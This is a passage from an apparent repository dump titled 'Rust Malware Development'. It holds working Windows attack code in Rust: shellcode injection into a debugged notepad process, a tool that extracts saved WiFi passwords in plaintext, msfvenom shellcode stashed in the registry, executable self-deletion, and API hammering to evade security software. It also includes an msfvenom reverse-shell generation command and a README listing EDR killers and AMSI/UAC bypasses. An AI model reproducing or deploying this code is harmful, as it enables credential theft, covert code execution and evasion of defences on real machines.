        0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
    ];

    unsafe{
        let mut debug_info: DEBUG_EVENT = std::mem::zeroed();

        let mut startup_info: STARTUPINFOW = std::mem::zeroed();
        startup_info.cb = std::mem::size_of::<STARTUPINFOW>() as u32;

        let mut process_info: PROCESS_INFORMATION = std::mem::zeroed();

        let path = r"C:\Windows\System32\notepad.exe";

        let path_name: Vec<u16> = OsStr::new(path)
            .encode_wide()
            .chain(std::iter::once(0))
            .collect();

        okey!("Target Path: {}", path);
        
        let create_process = CreateProcessW(
            null_mut(),
            path_name.as_ptr() as *mut u16,
            null_mut(), 
            null_mut(), 
            0,
            winapi::um::winbase::DEBUG_ONLY_THIS_PROCESS,
            null_mut(), 
            null_mut(), 
            &mut startup_info, 
            &mut process_info,
        );

        if create_process == 0{
            println!("Break 1");
            error!("CreateProcessW Failed: {}", GetLastError());
        }

        for num in 0..7 {
            if WaitForDebugEvent(&mut debug_info, 0xFFFFFFFF) != 0 {
                
                match debug_info.dwDebugEventCode {
                    3 => { // CREATE_PROCESS_DEBUG_EVENT
                        okey!("Process PID: {}", debug_info.dwProcessId);
                        okey!("Thread ID: {}", debug_info.dwThreadId);
                        okey!("StartAddress: {:?}", debug_info.u.CreateProcessInfo().lpStartAddress.unwrap());
                        okey!("Main Thread: {:?}", debug_info.u.CreateProcessInfo().hThread);
                    },

                    2 => { // CREATE_THREAD_DEBUG_EVENT
                        println!();
                        okey!("Thread Created: {:?}", debug_info.u.CreateThread().lpStartAddress);
                        okey!("Thread Handle: {:?}", debug_info.u.CreateThread().hThread);
                        okey!("Thread ThreadLocalBase: {:?}", debug_info.u.CreateThread().lpThreadLocalBase);
                    },

                    LOAD_DLL_DEBUG_EVENT => { // LOAD_DLL_DEBUG_EVENT
                        let mut buffer = [0u8; std::mem::size_of::<*mut c_void>()];
                        let mut return_number = 0;

                        let success = ReadProcessMemory(
                            process_info.hProcess, 
                            debug_info.u.LoadDll().lpImageName as *mut c_void,
                            buffer.as_mut_ptr() as *mut c_void,
                            std::mem::size_of::<*mut c_void>(),
                            &mut return_number,
                        );

                        if success == 0 {
                            error!("ReadProcessMemory(1) Failed: {}", GetLastError());
                        }

                        let dll_address = usize::from_ne_bytes(buffer) as *mut c_void;
                        let mut image_name = vec![0u16; 260];

                        okey!("DLL ADDRESS: {:?}", dll_address);

                        let success = ReadProcessMemory(
                            process_info.hProcess, 
                            dll_address, 
                            image_name.as_mut_ptr() as _, 
                            image_name.len() * std::mem::size_of::<u16>(), 
                            &mut return_number,
                        );

                        if success == 0 {
                            error!("ReadProcessMemory(2) Failed: {}", GetLastError());
                        }

                        if let Some(first_null) = image_name.iter().position(|&c| c == 0) {
                            image_name.truncate(first_null);
                        }

                        let dll_name = String::from_utf16_lossy(&image_name);
                        okey!("DLL Name: {}", dll_name.trim_end_matches('\0'));
                        okey!("DLL Base Address: {:?}", debug_info.u.LoadDll().lpBaseOfDll);
                        okey!("DLL H_File: {:?}", debug_info.u.LoadDll().hFile);
                    },

                    1 => { //EXCEPTION_DEBUG_EVENT
                        if debug_info.u.Exception().ExceptionRecord.ExceptionCode == EXCEPTION_BREAKPOINT {
                            okey!("BreakPoint Successfully Triggered {}", '!');
                        }
                    },

                    _ => {}
                }

                if num == 6 {
                    let mut number_of_write = 0;
                    let success = WriteProcessMemory(
                        process_info.hProcess,
                        std::mem::transmute::<_, *mut c_void>(debug_info.u.CreateProcessInfo().lpStartAddress),
                        shellcode.as_ptr() as _,
                        shellcode.len(),
                        &mut number_of_write,
                    );

                    if success == 0 {
                        error!("WriteProcessMemory Failed: {}", GetLastError());
                    }

                    let active_proc = DebugActiveProcessStop(process_info.dwProcessId);
                    
                    if active_proc == 0 {
                        error!("DebugActiveProcessStop Failed: {}", GetLastError());
                    }
                }

                if num < 6 {
                    let dbg_continue = ContinueDebugEvent(
                        process_info.dwProcessId,
                        process_info.dwThreadId,
                        0x00010002, // DBG_CONTINUE
                    );

                    if dbg_continue == 0 {
                        error!("ContinueDebugEvent Failed: {}", GetLastError());
                    }
                }
            }
        }

        let sym_success = SymInitialize(
            0xFFFFFFFFFFFFFFFFu64 as *mut c_void,
            null_mut(),
            1
        );

        if sym_success == 0 {
            error!("SymInitialize Error: {}", GetLastError());
        }

        let mut symbol = std::mem::zeroed::<SYMBOL_INFOW>();

        symbol.SizeOfStruct = std::mem::size_of::<SYMBOL_INFOW>() as u32;

        let virtual_alloc_addr: Vec<_> = "VirtualAllocEx".encode_utf16().collect();
        let success = SymFromNameW(
            0xffffffffffffffffu64 as _, 
            virtual_alloc_addr.as_ptr(),
            &mut symbol
        );

        if success == 0 {
            error!("VirtualAlloc SymFromName Failed: {:?}", GetLastError());
        }

        okey!("Addr of VirtualAllocEx: {:?}", symbol.Address as *mut c_void);

        let create_remote_thread: Vec<_> = "CreateRemoteThread".encode_utf16().collect();
        let success = SymFromNameW(
            0xffffffffffffffffu64 as _, 
            create_remote_thread.as_ptr(),
            &mut symbol
        );

        if success == 0 {
            error!("CreateRemoteThread SymFromName Failed: {:?}", GetLastError());
        }

        okey!("Addr of CreateRemoteThread: {:?}", symbol.Address as *mut c_void);

        let nt_protect_memory: Vec<_> = "NtProtectVirtualMemory".encode_utf16().collect();
        let success = SymFromNameW(
            0xffffffffffffffffu64 as _, 
            nt_protect_memory.as_ptr(),
            &mut symbol
        );

        if success == 0 {
            error!("NtProtectVirtualMemory SymFromName Failed: {:?}", GetLastError());
        }

        okey!("Addr of NtProtectVirtualMemory: {:?}", symbol.Address as *mut c_void);
    }
}

#[link(name = "Dbghelp")]
#[allow(non_snake_case)]
extern "system" {
    pub fn SymInitialize(
        hProcess: HANDLE,
        UserSearchPath: *const c_char,
        fInvadeProcess: BOOL,
    ) -> BOOL;
}
```

## README.md
```markdown
# Rust Malware Development

![Compilation](https://img.shields.io/badge/building-passing-brightgreen)
![Issues](https://img.shields.io/github/issues/Whitecat18/Rust-for-Malware-Development)

Welcome to the Ultimate Rust Malware Development Resources Collection.

Rust-developed malware has gained significant attention in the cybersecurity community due to the language's memory safety, performance benefits, and ability to bypass traditional detection methods. While C and C++ have been the traditional choices for malware development, Rust offers a compelling alternative with its modern features and growing ecosystem.

## Example Codes

- [x] [Shellcode Injection](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Shellcode%20Execution)
- [ ] [API Hammering](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/api_hammering)
- [x] [Shellcode Encryption](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Shellcode%20Execution/RC4_AES)
- [x] [Disabler AV/XDR/EDR](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/EDR-AV%20Killer)
- [x] [Process Injection](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Process%20Injection)
- [ ] [ThreadLess Injection](./Process-Injection/ThreadlessInject.rs)
- [x] [Process Hollowing](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Process%20Hollowing)
- [x] [DLL Injection](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/DLL%20Injection)
- [x] [Running .NET Assembly](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/.NET%20Execution)
- [x] [AMSI Bypass](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/AMSI%20Bypass)
- [x] [ETW Bypass](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/ETW%20Bypass)
- [x] [Hooking Native API](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Hooks)
- [x] [Process Enumeration](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/PROCESS_ENUMERATION)
- [x] [Syscall Indirect](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Windows-Native-Api/indirect-syscall)
- [ ] [DLL Unhooking](./dll_injection/dll_unhooking.rs)
- [ ] [Process Hypnosis](./ProcessHypnosis)
- [x] [Remote Process Memory Map](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Windows-Native-Api/enumerate_memory_info)
- [ ] [Process Ghosting](./ProcessGhosting)
- [x] [Function Stomping](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Function%20Stomping)
- [ ] [Self Deletion Technique](./Self-Deletion-Techniques/Alternate_Data_Stream/)
- [x] [Hells Gate & Halo's Gate](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/HellsGate)
- [x] [UAC Bypass](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/UAC%20Bypass)
- [x] [Reg Persistence](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Registry_Persistence)
- [x] [Memory Scanning](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Memory%20Scanning)
- [x] [DLL Sideloading](https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/DLL%20SideLoading)
- [x] [Obfuscation Techniques](./obfuscation)
- [x] [RegShell](./RegShell/src/main.rs)
- [x] [Metadata Modification](./Metadata_Modification)

## References & Resources

### Core Libraries

* [winapi-rs](https://github.com/retep998/winapi-rs) - Rust bindings to Windows APIs
* [Windows-rs](https://github.com/microsoft/windows-rs) - Microsoft's official Rust for Windows
* [ntapi](https://github.com/MSxDOS/ntapi) - Rust bindings for Native Windows NT APIs
* [Rust Std Lib](https://doc.rust-lang.org/std/) - Rust Standard Library Reference

### Dependency Example

```toml
[dependencies]
winapi = { version = "0.3.9", features = ["winuser", "processthreadsapi", "memoryapi", "errhandlingapi", "synchapi", "handleapi", "winbase"] }
ntapi = "0.4.1"
```

### Articles & Learning Resources

* [Rust Basics](https://doc.rust-lang.org/book/) - The Rust Programming Language Book
* [DLL Injection using Rust](https://smukx.medium.com/dll-injection-using-rust-593b83734c90)

⚠️ These Resources are only for Education Purposes Only ⚠️
```

## Recon/extract_wifi/src/main.rs
```rust
/*
    Extract Wifi Passwords  
    For More Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
*/

macro_rules! error {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\_____[!] {}", format!($msg, $($arg), *));   
    }
}

use std::ptr::null_mut;
use std::slice;
use winapi::{ctypes::c_void, shared::winerror::ERROR_SUCCESS};
use winapi::um::wlanapi::*;
use winapi::um::winnt::LPWSTR;
use widestring::U16CString;
use quick_xml::{Reader, events::Event};
use log::{info, error};

fn main() {
    env_logger::init();
    unsafe {
        let mut handle: *mut c_void = null_mut();
        let client_version: u32 = 2;
        let mut negotiated_version: u32 = 0;
        let result = WlanOpenHandle(client_version, null_mut(), &mut negotiated_version, &mut handle);
        if result != ERROR_SUCCESS {
            error!("WlanOpenHandle failed with error: {}", result);
            return;
        }
        info!("WlanOpenHandle succeeded");

        let mut interface_list: *mut WLAN_INTERFACE_INFO_LIST = null_mut();
        let result = WlanEnumInterfaces(handle, null_mut(), &mut interface_list);
        if result != ERROR_SUCCESS {
            error!("WlanEnumInterfaces failed with error: {}", result);
            WlanCloseHandle(handle, null_mut());
            return;
        }
        info!("WlanEnumInterfaces succeeded");

        let interface_list_ref = &*interface_list;
        let interfaces = slice::from_raw_parts(interface_list_ref.InterfaceInfo.as_ptr(), interface_list_ref.dwNumberOfItems as usize);

        for interface in interfaces {
            let interface_guid = &interface.InterfaceGuid;

            let mut profile_list: *mut WLAN_PROFILE_INFO_LIST = null_mut();
            let result = WlanGetProfileList(handle, interface_guid, null_mut(), &mut profile_list);
            if result != ERROR_SUCCESS {
                error!("WlanGetProfileList failed with error: {}", result);
                continue;
            }
            info!("WlanGetProfileList succeeded");

            let profile_list_ref = &*profile_list;
            let profiles = slice::from_raw_parts(profile_list_ref.ProfileInfo.as_ptr(), profile_list_ref.dwNumberOfItems as usize);

            for profile in profiles {
                let profile_name = U16CString::from_ptr_str(profile.strProfileName.as_ptr());

                let mut profile_xml: LPWSTR = null_mut();
                let mut flags = WLAN_PROFILE_GET_PLAINTEXT_KEY;
                let result = WlanGetProfile(handle, interface_guid, profile_name.as_ptr(), null_mut(), &mut profile_xml, &mut flags, null_mut());
                if result != ERROR_SUCCESS {
                    error!("WlanGetProfile failed with error: {}", result);
                    continue;
                }

                let profile_xml_slice = slice::from_raw_parts(profile_xml, wcslen(profile_xml));
                let profile_xml_string = String::from_utf16_lossy(profile_xml_slice);

                let mut reader = Reader::from_str(&profile_xml_string);
                reader.trim_text(true);
                let mut in_shared_key = false;
                let mut key_material = String::new();

                loop {
                    match reader.read_event() {
                        Ok(Event::Start(ref e)) => {
                            if e.name() == quick_xml::name::QName(b"keyMaterial") {
                                in_shared_key = true;
                            }
                        }
                        Ok(Event::Text(ref e)) if in_shared_key => {
                            key_material = e.escape_ascii().to_string();
                            in_shared_key = false;
                        }
                        Ok(Event::Eof) => break,
                        Err(e) => {
                            error!("Error parsing the XML: {:?}", e);
                            break;
                        }
                        _ => (),
                    }
                }

                if !key_material.is_empty() {
                    println!("NAME: {} | PASSWD: {}", profile_name.to_string_lossy(), key_material);
                } else {
                    println!("NAME: {} | PASSWD NOT FOUND", profile_name.to_string_lossy());
                }
                WlanFreeMemory(profile_xml as *mut _);
            }
            WlanFreeMemory(profile_list as *mut _);
        }

        WlanFreeMemory(interface_list as *mut _);
        WlanCloseHandle(handle, null_mut());
        info!("WlanCloseHandle succeeded");
    }
}

unsafe fn wcslen(mut s: *const u16) -> usize {
    let mut len = 0;
    while *s != 0 {
        len += 1;
        s = s.add(1);
    }
    len
}
```

## RegShell/src/main.rs
```rust
use std::ptr::null_mut;

use winapi::{
    shared::minwindef::HKEY,
    um::{errhandlingapi::GetLastError, 
        winnt::{KEY_SET_VALUE, REG_BINARY}, 
        winreg::{RegCloseKey, RegGetValueA, RegOpenKeyExA, RegSetValueExA, HKEY_CURRENT_USER, RRF_RT_ANY}
    }
};

// simple msf calc.exe shellcode 
const SHELLCODE: [u8; 276] = [
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
    0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
    0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
    0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
    0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
    0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
    0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
    0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
    0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
    0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
    0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
    0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
    0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
    0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
    0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
    0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
    0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
    0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
];

fn main(){
    match write_registry(&SHELLCODE){
        Ok(_) => println!("Written to Registry"),
        Err(e) => eprintln!("Error Writing into Registry {}", e),
    }

    match read_registry(SHELLCODE.len()){
        Ok(data) => println!("{:?}", data),
        Err(e) => eprintln!("Unable to read from registry: {}", e),
    }
}

fn write_registry(buf: &[u8]) -> Result<(), String>{
    unsafe{
        let mut hkey: HKEY = null_mut();
        let status = RegOpenKeyExA(
            HKEY_CURRENT_USER,
            b"Control Panel\0".as_ptr() as *const i8, 
            0,
            KEY_SET_VALUE, 
            &mut hkey,
        );

        if status != 0{
            return Err(format!(
                "Failed to open registry key. Error code: {}",
                GetLastError()
            ));
        }

        let status = RegSetValueExA(
            hkey,
            b"smukx_nerdy\0".as_ptr() as *const i8,
            0,
            REG_BINARY,
            buf.as_ptr(),
            buf.len() as u32
        );

        if status != 0 {
            RegCloseKey(hkey);
            return Err(format!(
                "Failed to set registry value. Error code: {}",
                GetLastError()
            ));
        }

        RegCloseKey(hkey);
        Ok(())
    }
}

fn read_registry(size: usize) -> Result<Vec<u8>, String> {
    unsafe {
        let mut data = vec![0u8; size];
        let mut data_size = size as u32;
        let mut data_type = 0;

        let status = RegGetValueA(
            HKEY_CURRENT_USER,
            b"Control Panel\0".as_ptr() as *const i8,
            b"smukx_nerdy\0".as_ptr() as *const i8,
            RRF_RT_ANY,
            &mut data_type,
            data.as_mut_ptr() as _,
            &mut data_size,
        );

        if status != 0 {
            return Err(format!(
                "Failed to read registry value. Error code: {}",
                GetLastError()
            ));
        }

        Ok(data)
    }
}
```

## Self-Deletion-Techniques/Alternate_Data_Stream/src/main.rs
```rust
/*
    Self Deletion Technique
*/

use std::ffi::OsString;
use std::os::windows::ffi::OsStrExt;
use std::ptr::null_mut;
use winapi::ctypes::c_void;
use winapi::um::fileapi::{CreateFileW, SetFileInformationByHandle, FILE_RENAME_INFO};
use winapi::um::handleapi::CloseHandle;
use winapi::um::heapapi::HeapFree;
use winapi::um::minwinbase::{FileDispositionInfo, FileRenameInfo};
use winapi::um::winbase::FILE_FLAG_DELETE_ON_CLOSE;
use winapi::um::winnt::{FILE_ATTRIBUTE_NORMAL, HEAP_ZERO_MEMORY};
use winapi::um::{fileapi::FILE_DISPOSITION_INFO, heapapi::{GetProcessHeap, HeapAlloc}};

// macro_rules! okey {
//     ($msg:expr, $($arg:expr), *) => {
//         println!("[+] {}",format!($msg, $($arg), *));
//     }
// }

// macro_rules! error {
//     ($msg:expr, $($arg:expr), *) => {
//         println!("[!] {}",format!($msg, $($arg), *));
//         println!("Exiting ...");
//         std::process::exit(1);
//     };
// }

fn main(){
    // This stream name is for alternate stream.
    let stream = ":test_stream";
    let stream_wide: Vec<u16> = OsString::from(stream).encode_wide().chain(std::iter::once(0)).collect();

    unsafe{
        let mut delete_file = FILE_DISPOSITION_INFO{
            DeleteFile: 1 // default value is 1
        };

        let rename_info_size = std::mem::size_of::<FILE_RENAME_INFO>() + (stream_wide.len() * std::mem::size_of::<u16>());
        
        // allocate memory for FILE_RENAME_INFO
        let rename_info = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, rename_info_size) as *mut FILE_RENAME_INFO;

        if rename_info.is_null() {
            panic!("Memory allocation failed");
        }

        delete_file.DeleteFile = 1;
        (*rename_info).FileNameLength = (stream_wide.len() * std::mem::size_of::<u16>()) as u32 - 2;

        std::ptr::copy_nonoverlapping(
            stream_wide.as_ptr(),
            (*rename_info).FileName.as_mut_ptr(),
            stream_wide.len(),
        );

        let path = std::env::current_exe().unwrap();
        let mut full_path: Vec<u16> = OsString::from(path).encode_wide().collect();
        full_path.push(0);

        // Open the file with delete and synchronize permissions
        let handle = CreateFileW(
            full_path.as_ptr(),
            0x00010000 | 0x00100000,
            0x00000001,
            core::ptr::null_mut(),
            3, // OPEN_EXISTING
            0 as u32, // FILE_ATTRIBUTE_NORMAL
            null_mut(),
        );

        if handle.is_null() {
            panic!("Failed to open file");
        }

        // rename the alternate data stream
        let setfileinfohandle = SetFileInformationByHandle(
            handle, 
            FileRenameInfo, 
            rename_info as *mut c_void, 
            rename_info_size as u32
        );

        if setfileinfohandle == 0 {
            panic!("Failed to set file information for rename");
        }

        CloseHandle(handle);

        // Re-open the file with delete on close flag
        let handle = CreateFileW(
            full_path.as_ptr(),
            0x00010000 | 0x40000000 | 0x00100000,
            0x00000001,
            std::ptr::null_mut(),
            3, 
            FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE,
            null_mut(),
        );

        if handle == null_mut() {
            panic!("Failed to re-open file for deletion");
        }

        // mark the file for deletion
        let setfileinfo = SetFileInformationByHandle(
            handle, 
            FileDispositionInfo, 
            &delete_file as *const FILE_DISPOSITION_INFO as *mut c_void, 
            std::mem::size_of::<FILE_DISPOSITION_INFO>() as u32
        );

        if setfileinfo == 0 {
            panic!("Failed to mark file for deletion");
        }

        CloseHandle(handle); // -> delete the file  

        // free the allocated memory
        HeapFree(
            GetProcessHeap(), 
            0, 
            rename_info as *mut c_void,
        );
    }
}
```

## api_hammering/Cargo.toml
```toml
[package]
name = "api_hammering"
version = "0.1.0"
edition = "2021"

[dependencies]
rand = "0.8.5"
windows = {version = "0.58.0", features = [
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_Security",
    "Win32_System_Threading",
    "Win32_Storage_FileSystem",
    "Win32_System_Registry",
    "Win32_System_ProcessStatus",
    "Win32_System_SystemInformation",
    "Win32_System_Diagnostics_Debug",   
]}
```

## api_hammering/README.md
```markdown
# Windows API Hammering

### What is Windows API Hammering?

API Hammering is a trick can used to avoid being caught by security software. Imagine you're trying to hide what you're doing by doing a lot of pointless things at the same time. That's kind of what API Hammering does. It makes the computer do a bunch of unnecessary tasks, like opening and closing files or running empty loops, to cover up the real malware stuff it's trying to do.

### Why Use API Hammering?

This method helps these programs such as malwares stay hidden because security tools, which quickly scan what programs are doing, might just see the noise (all the useless tasks) and not the quiet, bad actions happening in between.

### Functions: 

Each Functions are explained.

By [@5mukx](https://x.com/5mukx)
```

## api_hammering/src/main.rs
```rust
/*
    API Hammering
*/

use std::time::Duration;

use windows::{core::HSTRING, Win32::{Foundation::{CloseHandle, INVALID_HANDLE_VALUE}, Storage::FileSystem::{CreateFileW, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_SHARE_WRITE, OPEN_EXISTING}, System::{Diagnostics::Debug::{OutputDebugStringA, OutputDebugStringW}, ProcessStatus::GetModuleFileNameExW, Registry::{RegCloseKey, RegOpenKeyExW, HKEY, HKEY_CURRENT_USER, KEY_READ}, Threading::{GetCurrentProcess, Sleep}}}};
use rand::{thread_rng, Rng};
// sleep method 

fn api_hammering_sleep() -> windows::core::Result<()> {
    // Simple sleep technique
    unsafe {
        Sleep(300000); // Sleep for 5 minutes
    }
    Ok(())
}

fn api_hammering_random_sleep() -> windows::core::Result<()> {
    // Random sleep duration to evade static analysis
    let mut rng = thread_rng();
    let sleep_duration = rng.gen_range(60..=600); 
    std::thread::sleep(Duration::from_secs(sleep_duration as u64));
    Ok(())
}

fn api_hammering_windows_api_calls() -> windows::core::Result<()> {
    // hammering by making numerous benign API calls
    const ITERATIONS: u32 = 100000;
    for i in 0..ITERATIONS {
        unsafe {
            let message = format!("Hammering iteration: {}", i);
            OutputDebugStringW(windows::core::PCWSTR::from_raw(message.encode_utf16().collect::<Vec<_>>().as_ptr()));
            OutputDebugStringA(windows::core::PCSTR::from_raw(message.as_ptr()));
        }
    }
    Ok(())
}

fn api_hammering_file_operations() -> windows::core::Result<()>{
    // hammering by performing file operations
    const ITERATIONS: u32 = 1000;
    for _ in 0..ITERATIONS {
        unsafe{
            let file_path = windows::core::PWSTR::from_raw("C:\\Windows\\System32\\drivers\\etc\\hosts\0".as_ptr() as *mut _);
            let handle = CreateFileW(
                file_path,
                2147483648u32 | 1073741824u32,
                FILE_SHARE_READ | FILE_SHARE_WRITE,
                None,
                OPEN_EXISTING,
                FILE_ATTRIBUTE_NORMAL,
                None
            ).expect("Error Performing CreateFileW");

            if handle != INVALID_HANDLE_VALUE {
                CloseHandle(handle).expect("Error Closing Handle");
            }
        }
    }
    Ok(())
}


fn api_hammering_system_info() -> windows::core::Result<()> {
    // hammering by querying system information
    use windows::Win32::System::SystemInformation::{GetSystemInfo, SYSTEM_INFO};
    
    const ITERATIONS: u32 = 1000;
    for _ in 0..ITERATIONS {
        unsafe {
            let mut system_info: SYSTEM_INFO = std::mem::zeroed();
            GetSystemInfo(&mut system_info);
        }
    }
    Ok(())
}

fn api_hammering_registry_access() -> windows::core::Result<()> {
    // hammering by accessing registry keys
    const ITERATIONS: u32 = 1000;
    for _ in 0..ITERATIONS {
        unsafe {
            let mut handle = HKEY::default();
            let key_path = HSTRING::from("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
            
            // Open the registry key
            let result = RegOpenKeyExW(
                HKEY_CURRENT_USER,
                &key_path,
                0,
                KEY_READ,
                &mut handle
            );
            
            if result.is_ok() {
                let _ = RegCloseKey(handle);
            } else {
                println!("Failed to open key: {:?}", result);
            }
        }    
    }
    Ok(())
}

fn api_hammering_module_info() -> windows::core::Result<()> {
    // hammering by repeatedly getting module file names
    let process = unsafe { GetCurrentProcess() };
    const ITERATIONS: u32 = 1000;
    for _ in 0..ITERATIONS {
        unsafe {
            let mut buffer = [0u16; 1024];
            let result = GetModuleFileNameExW(
                process, 
                None, 
                &mut buffer,
            );

            if result > 0 {
                let filename = String::from_utf16_lossy(&buffer[..result as usize]);
                println!("Current module file name: {:?}", filename);
            } else {
                println!("Failed to get module file name.");
            }
        }
    }
    Ok(())
}


fn api_hammering_interactive_sandbox_detection() -> windows::core::Result<()> {
    // detection and delay based on interactive user behavior
    let mut rng = thread_rng();
    let sleep_duration = rng.gen_range(10..=100); // sleep between 10 to 100 seconds
    std::thread::sleep(Duration::from_secs(sleep_duration as u64));

    println!("Checking for interactive user...");
    Ok(())
}



fn main() {
    api_hammering_sleep().unwrap();
    api_hammering_system_info().unwrap();
    api_hammering_module_info().unwrap();
    api_hammering_random_sleep().unwrap();
    api_hammering_registry_access().unwrap();
    api_hammering_file_operations().unwrap();
    api_hammering_windows_api_calls().unwrap();
    api_hammering_interactive_sandbox_detection().unwrap();
}
```

## obfuscation/Cargo.toml
```toml
[package]
name = "obfuscation"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
clap = { version = "4.5.0", features = ["derive"] }
uuid = "1.8.0"
```

## obfuscation/README.md
```markdown
## Shellcode Obfuscation and Deobfuscation Technique

With this code you can obfuscate and deobfuscate shellcode using Ipv4, Ipv6, MAC, UUiD formats.

## Usages

#### Due to security reasons. Im removing the payload.bin. You generate the .bin on you own ..!

Example: `msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin`

### Command Format

```
cargo run -- -f <file> -t <technique> -o <operation>
```

### simply run the program to view the usages 

```
cargo run
```
![cargo run](images/cargo_run.png)


### To obfuscate the payload.

```
cargo run -- -f .\payload.bin -t ipv4 -o obfuscate
```
![obfuscate ipv4](images/obfuscating_ipv4.png)

### To Deobfuscate the paylaod 

```
cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate
```
![deobfuscate ipv4](images/deobfuscating_ipv4.png)

## ALL USAGES

### Obfuscation Commands

Obfuscate Using IPv4

```
cargo run -- -f .\payload.bin -t ipv4 -o obfuscate
```

Obfuscate Using IPv6

```
cargo run -- -f .\payload.bin -t ipv6 -o obfuscate
```

Obfuscate Using MAC

```
cargo run -- -f .\payload.bin -t mac -o obfuscate
```

Obfuscate Using UUID

```
cargo run -- -f .\payload.bin -t uuid -o obfuscate
```

## obfuscation/README.md (continued)
```markdown
### Deobfuscation Commands

Deobfuscate Using IPv4

```
cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate
```

Deobfuscate Using IPv6

```
cargo run -- -f .\obfuscated_ipv6.txt -t ipv6 -o deobfuscate

```

Deobfuscate Using MAC

```
cargo run -- -f .\obfuscated_mac.txt -t mac -o deobfuscate
```

Deobfuscate Using UUID

```
cargo run -- -f .\obfuscated_uuid.txt -t uuid -o deobfuscate
```

## Resources Used

Thanks for the Wonderful Content and Resource by <b><a href="https://maldevacademy.com/" > Maldev Academy</a></b>.

For more Malware POC and codes visit <b><a href="https://github.com/Whitecat18/Rust-for-Malware-Development.git" > Rust for Malware Development</a></b> Repository. 

By @<a href="https://twitter.com/5mukx" >5mukx </a>
```

## obfuscation/src/main.rs
```rust
/*
    Shellcode Obfuscation and Deobfuscation Technique
    Wonderful Resource By Maldev Academy (LF NOTE: DMCA'd Component)
*/

use std::fs::File;
use std::io::{Read, Write, BufReader, BufRead};
use std::net::{Ipv4Addr, Ipv6Addr};
use uuid::Uuid;
use clap::{Parser, ValueEnum};

#[derive(Parser)]
#[clap(about = "Shellcode Obfuscation and Deobfuscation Technique")]
pub struct Args {
